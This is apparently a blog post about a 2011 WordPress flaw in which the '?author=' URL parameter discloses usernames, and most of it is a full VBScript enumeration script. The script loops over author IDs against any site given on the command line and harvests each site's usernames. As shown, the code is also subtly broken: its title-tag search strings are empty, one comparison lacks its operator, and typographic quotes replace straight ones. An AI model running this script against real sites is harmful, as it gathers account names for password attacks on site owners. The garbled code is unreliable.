WordPress UserId & Username Enumeration Exploit/PoC Script

On 26th May 2011, a relatively easy to detect and exploit vulnerability was found with WordPress. The issue being with WordPress disclosing usernames based on a simple URL parameter and the consequent page redirect/HTTP status. Although WordPress has implemented usernames in the title bar as a feature, this can be abused easily by recursively supplying a author=number to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493

Even though there are a lot of scripts/exploits/PoC already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.

‘Author: [email protected]
‘User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3
‘This script allows an attacker to enumerate wordpress users by
‘querying the value of the parameter ‘author’ using xmlHTTP.

Dim url, sQuery, args, i, max

if wscript.arguments.count < 1 then
wscript.echo “WPEnum – WordPress User Enumeration Script”
wscript.echo “Author: [email protected]
wscript.echo “Insufficient Parameters.”
wscript.echo
wscript.echo “cscript WPEnum.vbs []”
wscript.echo “: A WordPress based website in the form of http://site/”
wscript.echo “:[Optional] Maximum number of users. Default 20.”
wscript.echo “Example: cscript WPEnum.vbs http://www.mywordpress.com/ 10”
wscript.echo
wscript.quit
End if

set args = wscript.Arguments

wscript.echo “WPEnum – WordPress User Enumeration Script”
wscript.echo “Author: [email protected]
wscript.echo
wscript.echo “Enumerating …”
wscript.echo

i=0
max=20
url = args(0)
if right(url,1) “/” then
url = url & “/”
End if

if wscript.arguments.count = 2 AND IsNumeric(args(1)) then
max=args(1)
End if

Set xmlHTTP = Nothing
set xmlHTTP = CreateObject(“Microsoft.XmlHttp”)

For i=1 to max
sQuery = args(0) & “?author=” & i
xmlHTTP.open “GET”, sQuery, false
xmlHTTP.send “”

wscript.sleep 70

do while not xmlHTTP.readyState=4
Loop

if xmlHTTP.status = 404 then
wscript.echo
i=i-1
wscript.echo i & ” users enumerated.”
wscript.echo “Done!”
Set xmlHTTP = Nothing
wscript. quit
End if

wscript.echo “Userid:” & i

k = Instr(Lcase(xmlHTTP.responseText),””)
j = Instr(Lcase(xmlHTTP.responseText),””)
username = Mid(xmlHTTP.responseText, k+7, j-k-7)
wscript.echo username
wscript.echo
Next

wscript.echo i & ” users enumerated.”
wscript.echo “Done!”

Set xmlHTTP = Nothing

‘End of program